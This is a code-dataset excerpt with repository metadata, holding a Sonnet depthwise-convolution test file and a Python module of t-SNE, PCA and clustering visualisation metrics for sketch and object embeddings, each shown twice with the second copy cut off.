('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
},
managers=[
('objects', accounts.models.NewManager()),
],
),
]
| true
| true
|
1c4215e580012b8cf3f0bf5efeb4374d96ab1b0d
| 8,357
|
py
|
Python
|
sonnet/src/depthwise_conv_test.py
|
ScriptBox99/deepmind-sonnet
|
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
|
[
"Apache-2.0"
] | 10,287
|
2017-04-07T12:33:37.000Z
|
2022-03-30T03:32:16.000Z
|
sonnet/src/depthwise_conv_test.py
|
ScriptBox99/deepmind-sonnet
|
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
|
[
"Apache-2.0"
] | 209
|
2017-04-07T15:57:11.000Z
|
2022-03-27T10:43:03.000Z
|
sonnet/src/depthwise_conv_test.py
|
ScriptBox99/deepmind-sonnet
|
5cbfdc356962d9b6198d5b63f0826a80acfdf35b
|
[
"Apache-2.0"
] | 1,563
|
2017-04-07T13:15:06.000Z
|
2022-03-29T15:26:04.000Z
|
# Copyright 2019 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for sonnet.v2.src.depthwise_conv."""
from absl.testing import parameterized
import numpy as np
from sonnet.src import depthwise_conv
from sonnet.src import initializers
from sonnet.src import test_utils
import tensorflow as tf
def create_constant_initializers(w, b, with_bias):
if with_bias:
return {
"w_init": initializers.Constant(w),
"b_init": initializers.Constant(b)
}
else:
return {"w_init": initializers.Constant(w)}
class DepthwiseConvTest(test_utils.TestCase, parameterized.TestCase):
def testInitializerKeysInvalidWithoutBias(self):
with self.assertRaisesRegex(ValueError, "b_init must be None"):
depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=3,
data_format="NHWC",
with_bias=False,
b_init=tf.zeros_initializer())
@parameterized.parameters(tf.float32, tf.float64)
def testDefaultInitializers(self, dtype):
if "TPU" in self.device_types and dtype == tf.float64:
self.skipTest("Double precision not supported on TPU.")
conv1 = depthwise_conv.DepthwiseConv2D(
kernel_shape=16, stride=1, padding="VALID", data_format="NHWC")
out = conv1(tf.random.normal([8, 64, 64, 1], dtype=dtype))
self.assertAllEqual(out.shape, [8, 49, 49, 1])
self.assertEqual(out.dtype, dtype)
# Note that for unit variance inputs the output is below unit variance
# because of the use of the truncated normal initalizer
err = 0.2 if self.primary_device == "TPU" else 0.1
self.assertNear(out.numpy().std(), 0.87, err=err)
@parameterized.named_parameters(("SamePaddingUseBias", True, "SAME"),
("SamePaddingNoBias", False, "SAME"),
("ValidPaddingNoBias", False, "VALID"),
("ValidPaddingUseBias", True, "VALID"))
def testFunction(self, with_bias, padding):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=3,
stride=1,
padding=padding,
with_bias=with_bias,
data_format="NHWC",
**create_constant_initializers(1.0, 1.0, with_bias))
conv2 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=3,
stride=1,
padding=padding,
with_bias=with_bias,
data_format="NHWC",
**create_constant_initializers(1.0, 1.0, with_bias))
defun_conv = tf.function(conv2)
iterations = 5
for _ in range(iterations):
x = tf.random.uniform([1, 5, 5, 1])
y1 = conv1(x)
y2 = defun_conv(x)
self.assertAllClose(self.evaluate(y1), self.evaluate(y2), atol=1e-4)
def testUnknownBatchSizeNHWC(self):
x = tf.TensorSpec([None, 5, 5, 3], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NHWC")
defun_conv = tf.function(c).get_concrete_function(x)
out1 = defun_conv(tf.ones([3, 5, 5, 3]))
self.assertEqual(out1.shape, [3, 5, 5, 3])
out2 = defun_conv(tf.ones([5, 5, 5, 3]))
self.assertEqual(out2.shape, [5, 5, 5, 3])
def testUnknownBatchSizeNCHW(self):
if self.primary_device == "CPU":
self.skipTest("NCHW not supported on CPU")
x = tf.TensorSpec([None, 3, 5, 5], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NCHW")
defun_conv = tf.function(c).get_concrete_function(x)
out1 = defun_conv(tf.ones([3, 3, 5, 5]))
self.assertEqual(out1.shape, [3, 3, 5, 5])
out2 = defun_conv(tf.ones([5, 3, 5, 5]))
self.assertEqual(out2.shape, [5, 3, 5, 5])
def testUnknownSpatialDims(self):
x = tf.TensorSpec([3, None, None, 3], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NHWC")
defun_conv = tf.function(c).get_concrete_function(x)
out = defun_conv(tf.ones([3, 5, 5, 3]))
expected_out = c(tf.ones([3, 5, 5, 3]))
self.assertEqual(out.shape, [3, 5, 5, 3])
self.assertAllEqual(self.evaluate(out), self.evaluate(expected_out))
out = defun_conv(tf.ones([3, 4, 4, 3]))
expected_out = c(tf.ones([3, 4, 4, 3]))
self.assertEqual(out.shape, [3, 4, 4, 3])
self.assertAllEqual(self.evaluate(out), self.evaluate(expected_out))
@parameterized.parameters(True, False)
def testUnknownChannels(self, autograph):
x = tf.TensorSpec([3, 3, 3, None], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NHWC")
defun_conv = tf.function(c, autograph=autograph)
with self.assertRaisesRegex(ValueError,
"The number of input channels must be known"):
defun_conv.get_concrete_function(x)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testComputationSame(self, with_bias):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=[3, 3],
stride=1,
padding="SAME",
with_bias=with_bias,
**create_constant_initializers(1.0, 1.0, with_bias))
out = conv1(tf.ones([1, 5, 5, 1]))
expected_out = np.array([[5, 7, 7, 7, 5], [7, 10, 10, 10, 7],
[7, 10, 10, 10, 7], [7, 10, 10, 10, 7],
[5, 7, 7, 7, 5]])
if not with_bias:
expected_out -= 1
self.assertEqual(out.shape, [1, 5, 5, 1])
self.assertAllClose(np.reshape(out.numpy(), [5, 5]), expected_out)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testComputationValid(self, with_bias):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=[3, 3],
stride=1,
padding="VALID",
with_bias=with_bias,
**create_constant_initializers(1.0, 1.0, with_bias))
out = conv1(tf.ones([1, 5, 5, 1]))
expected_out = np.array([[10, 10, 10], [10, 10, 10], [10, 10, 10]])
if not with_bias:
expected_out -= 1
self.assertEqual(out.shape, [1, 3, 3, 1])
self.assertAllClose(np.reshape(out.numpy(), [3, 3]), expected_out)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testComputationValidMultiChannel(self, with_bias):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=[3, 3],
stride=1,
padding="VALID",
with_bias=with_bias,
**create_constant_initializers(1.0, 1.0, with_bias))
out = conv1(tf.ones([1, 5, 5, 3]))
expected_out = np.array([[[10] * 3] * 3] * 3)
if not with_bias:
expected_out -= 1
self.assertAllClose(np.reshape(out.numpy(), [3, 3, 3]), expected_out)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testSharing(self, with_bias):
"""Sharing is working."""
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=3,
kernel_shape=3,
stride=1,
padding="SAME",
with_bias=with_bias)
x = np.random.randn(1, 5, 5, 1)
x1 = tf.constant(x, dtype=np.float32)
x2 = tf.constant(x, dtype=np.float32)
self.assertAllClose(conv1(x1), conv1(x2))
# Kernel shape was set to 3, which is expandeded to [3, 3, 3].
# Input channels are 1, output channels := in_channels * multiplier.
# multiplier is kernel_shape[2] == 3. So weight layout must be:
# (3, 3, 1, 3).
w = np.random.randn(3, 3, 1, 3) # Now change the weights.
conv1.w.assign(w)
self.assertAllClose(conv1(x1), conv1(x2))
if __name__ == "__main__":
tf.test.main()
| 35.411017
| 78
| 0.642216
|
from absl.testing import parameterized
import numpy as np
from sonnet.src import depthwise_conv
from sonnet.src import initializers
from sonnet.src import test_utils
import tensorflow as tf
def create_constant_initializers(w, b, with_bias):
if with_bias:
return {
"w_init": initializers.Constant(w),
"b_init": initializers.Constant(b)
}
else:
return {"w_init": initializers.Constant(w)}
class DepthwiseConvTest(test_utils.TestCase, parameterized.TestCase):
def testInitializerKeysInvalidWithoutBias(self):
with self.assertRaisesRegex(ValueError, "b_init must be None"):
depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=3,
data_format="NHWC",
with_bias=False,
b_init=tf.zeros_initializer())
@parameterized.parameters(tf.float32, tf.float64)
def testDefaultInitializers(self, dtype):
if "TPU" in self.device_types and dtype == tf.float64:
self.skipTest("Double precision not supported on TPU.")
conv1 = depthwise_conv.DepthwiseConv2D(
kernel_shape=16, stride=1, padding="VALID", data_format="NHWC")
out = conv1(tf.random.normal([8, 64, 64, 1], dtype=dtype))
self.assertAllEqual(out.shape, [8, 49, 49, 1])
self.assertEqual(out.dtype, dtype)
err = 0.2 if self.primary_device == "TPU" else 0.1
self.assertNear(out.numpy().std(), 0.87, err=err)
@parameterized.named_parameters(("SamePaddingUseBias", True, "SAME"),
("SamePaddingNoBias", False, "SAME"),
("ValidPaddingNoBias", False, "VALID"),
("ValidPaddingUseBias", True, "VALID"))
def testFunction(self, with_bias, padding):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=3,
stride=1,
padding=padding,
with_bias=with_bias,
data_format="NHWC",
**create_constant_initializers(1.0, 1.0, with_bias))
conv2 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=3,
stride=1,
padding=padding,
with_bias=with_bias,
data_format="NHWC",
**create_constant_initializers(1.0, 1.0, with_bias))
defun_conv = tf.function(conv2)
iterations = 5
for _ in range(iterations):
x = tf.random.uniform([1, 5, 5, 1])
y1 = conv1(x)
y2 = defun_conv(x)
self.assertAllClose(self.evaluate(y1), self.evaluate(y2), atol=1e-4)
def testUnknownBatchSizeNHWC(self):
x = tf.TensorSpec([None, 5, 5, 3], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NHWC")
defun_conv = tf.function(c).get_concrete_function(x)
out1 = defun_conv(tf.ones([3, 5, 5, 3]))
self.assertEqual(out1.shape, [3, 5, 5, 3])
out2 = defun_conv(tf.ones([5, 5, 5, 3]))
self.assertEqual(out2.shape, [5, 5, 5, 3])
def testUnknownBatchSizeNCHW(self):
if self.primary_device == "CPU":
self.skipTest("NCHW not supported on CPU")
x = tf.TensorSpec([None, 3, 5, 5], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NCHW")
defun_conv = tf.function(c).get_concrete_function(x)
out1 = defun_conv(tf.ones([3, 3, 5, 5]))
self.assertEqual(out1.shape, [3, 3, 5, 5])
out2 = defun_conv(tf.ones([5, 3, 5, 5]))
self.assertEqual(out2.shape, [5, 3, 5, 5])
def testUnknownSpatialDims(self):
x = tf.TensorSpec([3, None, None, 3], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NHWC")
defun_conv = tf.function(c).get_concrete_function(x)
out = defun_conv(tf.ones([3, 5, 5, 3]))
expected_out = c(tf.ones([3, 5, 5, 3]))
self.assertEqual(out.shape, [3, 5, 5, 3])
self.assertAllEqual(self.evaluate(out), self.evaluate(expected_out))
out = defun_conv(tf.ones([3, 4, 4, 3]))
expected_out = c(tf.ones([3, 4, 4, 3]))
self.assertEqual(out.shape, [3, 4, 4, 3])
self.assertAllEqual(self.evaluate(out), self.evaluate(expected_out))
@parameterized.parameters(True, False)
def testUnknownChannels(self, autograph):
x = tf.TensorSpec([3, 3, 3, None], dtype=tf.float32)
c = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1, kernel_shape=3, data_format="NHWC")
defun_conv = tf.function(c, autograph=autograph)
with self.assertRaisesRegex(ValueError,
"The number of input channels must be known"):
defun_conv.get_concrete_function(x)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testComputationSame(self, with_bias):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=[3, 3],
stride=1,
padding="SAME",
with_bias=with_bias,
**create_constant_initializers(1.0, 1.0, with_bias))
out = conv1(tf.ones([1, 5, 5, 1]))
expected_out = np.array([[5, 7, 7, 7, 5], [7, 10, 10, 10, 7],
[7, 10, 10, 10, 7], [7, 10, 10, 10, 7],
[5, 7, 7, 7, 5]])
if not with_bias:
expected_out -= 1
self.assertEqual(out.shape, [1, 5, 5, 1])
self.assertAllClose(np.reshape(out.numpy(), [5, 5]), expected_out)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testComputationValid(self, with_bias):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=[3, 3],
stride=1,
padding="VALID",
with_bias=with_bias,
**create_constant_initializers(1.0, 1.0, with_bias))
out = conv1(tf.ones([1, 5, 5, 1]))
expected_out = np.array([[10, 10, 10], [10, 10, 10], [10, 10, 10]])
if not with_bias:
expected_out -= 1
self.assertEqual(out.shape, [1, 3, 3, 1])
self.assertAllClose(np.reshape(out.numpy(), [3, 3]), expected_out)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testComputationValidMultiChannel(self, with_bias):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=1,
kernel_shape=[3, 3],
stride=1,
padding="VALID",
with_bias=with_bias,
**create_constant_initializers(1.0, 1.0, with_bias))
out = conv1(tf.ones([1, 5, 5, 3]))
expected_out = np.array([[[10] * 3] * 3] * 3)
if not with_bias:
expected_out -= 1
self.assertAllClose(np.reshape(out.numpy(), [3, 3, 3]), expected_out)
@parameterized.named_parameters(("WithBias", True), ("WithoutBias", False))
def testSharing(self, with_bias):
conv1 = depthwise_conv.DepthwiseConv2D(
channel_multiplier=3,
kernel_shape=3,
stride=1,
padding="SAME",
with_bias=with_bias)
x = np.random.randn(1, 5, 5, 1)
x1 = tf.constant(x, dtype=np.float32)
x2 = tf.constant(x, dtype=np.float32)
self.assertAllClose(conv1(x1), conv1(x2))
w = np.random.randn(3, 3, 1, 3)
conv1.w.assign(w)
self.assertAllClose(conv1(x1), conv1(x2))
if __name__ == "__main__":
tf.test.main()
| true
| true
|
1c4218b85311fa77639a3d344b13425637df0161
| 13,317
|
py
|
Python
|
metrics/visualisation.py
|
leosampaio/scene-designer
|
8a7276067acfde1997d386942aabc44d92436a1a
|
[
"MIT"
] | 9
|
2021-08-18T17:49:42.000Z
|
2022-02-22T02:15:07.000Z
|
metrics/visualisation.py
|
leosampaio/scene-designer
|
8a7276067acfde1997d386942aabc44d92436a1a
|
[
"MIT"
] | null | null | null |
metrics/visualisation.py
|
leosampaio/scene-designer
|
8a7276067acfde1997d386942aabc44d92436a1a
|
[
"MIT"
] | 1
|
2021-10-02T19:53:03.000Z
|
2021-10-02T19:53:03.000Z
|
import os
import numpy as np
from sklearn.manifold import TSNE
from sklearn.decomposition import PCA
import skimage.transform as sk_transform
from sklearn.cluster import KMeans
from PIL import Image
from core.metrics import ProjectionMetric, ImageMetric
class TSNEProjection(ProjectionMetric):
name = 'tsne'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
x, y, pred_x, pred_y, pred_z, tokenizer, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
# [194, 103, 317, 100, 112, 221, 223, 293, 239, 8],
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y, pred_z = y[idx], pred_z[idx]
for label, feature in zip(y, pred_z):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
feats.append(feature)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
return np.concatenate((tsne_results, labels),
axis=1)
class TSNEImagesProjection(ImageMetric):
name = 'tsne-images'
input_type = 'features_and_images'
def compute(self, input_data):
feats, images = input_data
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
tx, ty = tsne_results[:, 0], tsne_results[:, 1]
tx = (tx - np.min(tx)) / (np.max(tx) - np.min(tx))
ty = (ty - np.min(ty)) / (np.max(ty) - np.min(ty))
tsne_results[:, 0], tsne_results[:, 1] = tx, ty
width = 4000
height = 4000
max_dim = 100
full_image = Image.new('RGBA', (width, height))
for img, x, y in zip(images, tx, ty):
tile = img
rs = max(1, tile.shape[0] / max_dim, tile.shape[1] / max_dim)
tile = sk_transform.resize(tile, (int(tile.shape[0] / rs), int(tile.shape[1] / rs)), anti_aliasing=True)
tile = Image.fromarray(np.uint8(tile * 255))
full_image.paste(tile, (int((width - max_dim) * x), int((height - max_dim) * y)), mask=tile.convert('RGBA'))
image_plot_file = '/tmp/tsne-image-plot.png'
full_image.save(image_plot_file)
return image_plot_file
class EmbeddingTSNEProjection(ProjectionMetric):
name = 'embedding-tsne'
input_type = 'embedding_from_appearence_net_on_validation'
def compute(self, input_data):
emb, y = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
sel_x, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y = y[idx]
emb = emb[idx]
for feat, label in zip(emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_x.append(feat)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=5000,
random_state=14)
tsne_results = tsne.fit_transform(sel_x)
return np.concatenate((tsne_results, labels),
axis=1)
class EmbeddingPCAProjection(ProjectionMetric):
name = 'embedding-pca'
input_type = 'embedding_from_appearence_net_on_validation'
def compute(self, input_data):
emb, y = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
sel_x, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y = y[idx]
emb = emb[idx]
for feat, label in zip(emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_x.append(feat)
labels.append(label)
counter += 1
if counter >= 1000:
break
pca = PCA(n_components=2)
pca.fit(sel_x)
pca_result = pca.transform(sel_x)
return np.concatenate((pca_result, labels),
axis=1)
class EmbeddingsFromAppearenceNetTSNEProjection(ProjectionMetric):
name = 'common-embedding-tsne'
input_type = 'common_embedding_from_appearence_net_on_validation'
plot_type = 'scatter-with-shapes'
def compute(self, input_data):
obj_emb, sketch_emb, y, skt_y = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
skt_idx = np.random.permutation(len(skt_y))
np.random.seed()
sel_objs, sel_skts, labels, skt_labels, sel_labels, counter, label_counter = [], [], [], [], [], 0, 0
y = y[idx]
obj_emb = obj_emb[idx]
skt_y = skt_y[skt_idx]
sketch_emb = sketch_emb[skt_idx]
for skt, label in zip(sketch_emb, skt_y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_skts.append(skt)
skt_labels.append(label)
counter += 1
if counter >= 1000:
break
counter = 0
for obj, label in zip(obj_emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_objs.append(obj)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
combined_embs = np.concatenate((sel_objs, sel_skts), axis=0)
print(np.array(obj_emb).shape, np.array(sketch_emb).shape, np.array(sel_objs).shape, np.array(sel_skts).shape, np.array(combined_embs).shape, np.array(labels).shape)
tsne_results = tsne.fit_transform(combined_embs)
objs_tsne, skt_tsne = tsne_results[:len(sel_objs)], tsne_results[len(sel_objs):]
return np.array([np.concatenate((objs_tsne, np.expand_dims(labels, -1)),
axis=1),
np.concatenate((skt_tsne, np.expand_dims(skt_labels, -1)),
axis=1)])
class EmbeddingsFromTripletTSNEProjection(ProjectionMetric):
name = 'common-obj-rep-tsne'
input_type = 'rep_SBIR_on_validation_set'
plot_type = 'scatter-with-shapes'
def compute(self, input_data):
_, _, _, _, _, R_ave, mAP, obj_emb, sketch_emb, y = input_data
skt_y = y
np.random.seed(14)
idx = np.random.permutation(len(y))
skt_idx = np.random.permutation(len(skt_y))
np.random.seed()
sel_objs, sel_skts, labels, skt_labels, sel_labels, counter, label_counter = [], [], [], [], [], 0, 0
y = y[idx]
obj_emb = obj_emb[idx]
skt_y = skt_y[skt_idx]
sketch_emb = sketch_emb[skt_idx]
for skt, label in zip(sketch_emb, skt_y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_skts.append(skt)
skt_labels.append(label)
counter += 1
if counter >= 1000:
break
counter = 0
for obj, label in zip(obj_emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_objs.append(obj)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
combined_embs = np.concatenate((sel_objs, sel_skts), axis=0)
print(np.array(obj_emb).shape, np.array(sketch_emb).shape, np.array(sel_objs).shape, np.array(sel_skts).shape, np.array(combined_embs).shape, np.array(labels).shape)
tsne_results = tsne.fit_transform(combined_embs)
objs_tsne, skt_tsne = tsne_results[:len(sel_objs)], tsne_results[len(sel_objs):]
return np.array([np.concatenate((objs_tsne, labels),
axis=1),
np.concatenate((skt_tsne, skt_labels),
axis=1)])
class ClusterTSNEProjection(ProjectionMetric):
name = 'tsne-cluster'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
x, y, pred_x, pred_y, pred_z, tokenizer, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(x))
np.random.seed()
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
x, y, pred_z = x[idx], y[idx], pred_z[idx]
for sketch, label, feature in zip(x, y, pred_z):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
feats.append(feature)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
kmeans = KMeans(n_clusters=30, random_state=14).fit(feats)
cluster_labels = kmeans.labels_
sel_feats, feats_labels = None, None
for i in range(30):
clustered_feats = np.array(tsne_results)[np.where(cluster_labels == i)[0]]
sel_feats = np.concatenate((sel_feats, clustered_feats)) if sel_feats is not None else clustered_feats
feat_label = np.ones(len(clustered_feats,)) * i
feats_labels = np.concatenate((feats_labels, feat_label)) if feats_labels is not None else feat_label
np.random.seed()
return np.concatenate((sel_feats, np.expand_dims(feats_labels, axis=1)),
axis=1)
class PredictedLabelsTSNEProjection(ProjectionMetric):
name = 'tsne-predicted'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
x, y, pred_x, pred_y, pred_z, tokenizer, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y, pred_z, pred_y = y[idx], pred_z[idx], pred_y[idx]
for label, feature, pred_label in zip(y, pred_z, pred_y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
feats.append(feature)
labels.append(pred_label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
return np.concatenate((tsne_results, np.expand_dims(labels, axis=1)),
axis=1)
class PCAProjection(ProjectionMetric):
name = 'pca'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
entries, _, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(entries))
np.random.seed()
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
for i in idx:
skt = entries[i]
if skt['label'] not in sel_labels and label_counter < 10:
sel_labels.append(skt['label'])
label_counter += 1
if skt['label'] in sel_labels:
feats.append(skt['features'])
labels.append(skt['label'])
counter += 1
if counter >= 1000:
break
pca = PCA(n_components=2)
pca.fit(feats)
pca_result = pca.transform(feats)
return np.concatenate((pca_result, np.expand_dims(labels, axis=1)),
axis=1)
| 36.585165
| 174
| 0.560787
|
import os
import numpy as np
from sklearn.manifold import TSNE
from sklearn.decomposition import PCA
import skimage.transform as sk_transform
from sklearn.cluster import KMeans
from PIL import Image
from core.metrics import ProjectionMetric, ImageMetric
class TSNEProjection(ProjectionMetric):
name = 'tsne'
input_type = 'predictions_on_validation_set'
def compute(self, input_data):
x, y, pred_x, pred_y, pred_z, tokenizer, plot_filepath, tmp_filepath = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
feats, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y, pred_z = y[idx], pred_z[idx]
for label, feature in zip(y, pred_z):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
feats.append(feature)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
return np.concatenate((tsne_results, labels),
axis=1)
class TSNEImagesProjection(ImageMetric):
name = 'tsne-images'
input_type = 'features_and_images'
def compute(self, input_data):
feats, images = input_data
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
tsne_results = tsne.fit_transform(feats)
tx, ty = tsne_results[:, 0], tsne_results[:, 1]
tx = (tx - np.min(tx)) / (np.max(tx) - np.min(tx))
ty = (ty - np.min(ty)) / (np.max(ty) - np.min(ty))
tsne_results[:, 0], tsne_results[:, 1] = tx, ty
width = 4000
height = 4000
max_dim = 100
full_image = Image.new('RGBA', (width, height))
for img, x, y in zip(images, tx, ty):
tile = img
rs = max(1, tile.shape[0] / max_dim, tile.shape[1] / max_dim)
tile = sk_transform.resize(tile, (int(tile.shape[0] / rs), int(tile.shape[1] / rs)), anti_aliasing=True)
tile = Image.fromarray(np.uint8(tile * 255))
full_image.paste(tile, (int((width - max_dim) * x), int((height - max_dim) * y)), mask=tile.convert('RGBA'))
image_plot_file = '/tmp/tsne-image-plot.png'
full_image.save(image_plot_file)
return image_plot_file
class EmbeddingTSNEProjection(ProjectionMetric):
name = 'embedding-tsne'
input_type = 'embedding_from_appearence_net_on_validation'
def compute(self, input_data):
emb, y = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
sel_x, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y = y[idx]
emb = emb[idx]
for feat, label in zip(emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_x.append(feat)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=5000,
random_state=14)
tsne_results = tsne.fit_transform(sel_x)
return np.concatenate((tsne_results, labels),
axis=1)
class EmbeddingPCAProjection(ProjectionMetric):
name = 'embedding-pca'
input_type = 'embedding_from_appearence_net_on_validation'
def compute(self, input_data):
emb, y = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
np.random.seed()
sel_x, labels, sel_labels, counter, label_counter = [], [], [], 0, 0
y = y[idx]
emb = emb[idx]
for feat, label in zip(emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_x.append(feat)
labels.append(label)
counter += 1
if counter >= 1000:
break
pca = PCA(n_components=2)
pca.fit(sel_x)
pca_result = pca.transform(sel_x)
return np.concatenate((pca_result, labels),
axis=1)
class EmbeddingsFromAppearenceNetTSNEProjection(ProjectionMetric):
name = 'common-embedding-tsne'
input_type = 'common_embedding_from_appearence_net_on_validation'
plot_type = 'scatter-with-shapes'
def compute(self, input_data):
obj_emb, sketch_emb, y, skt_y = input_data
np.random.seed(14)
idx = np.random.permutation(len(y))
skt_idx = np.random.permutation(len(skt_y))
np.random.seed()
sel_objs, sel_skts, labels, skt_labels, sel_labels, counter, label_counter = [], [], [], [], [], 0, 0
y = y[idx]
obj_emb = obj_emb[idx]
skt_y = skt_y[skt_idx]
sketch_emb = sketch_emb[skt_idx]
for skt, label in zip(sketch_emb, skt_y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_skts.append(skt)
skt_labels.append(label)
counter += 1
if counter >= 1000:
break
counter = 0
for obj, label in zip(obj_emb, y):
if label not in sel_labels and label_counter < 10:
sel_labels.append(label)
label_counter += 1
if label in sel_labels:
sel_objs.append(obj)
labels.append(label)
counter += 1
if counter >= 1000:
break
tsne = TSNE(n_components=2,
verbose=0, perplexity=30,
n_iter=1000,
random_state=14)
combined_embs = np.concatenate((sel_objs, sel_skts), axis=0)
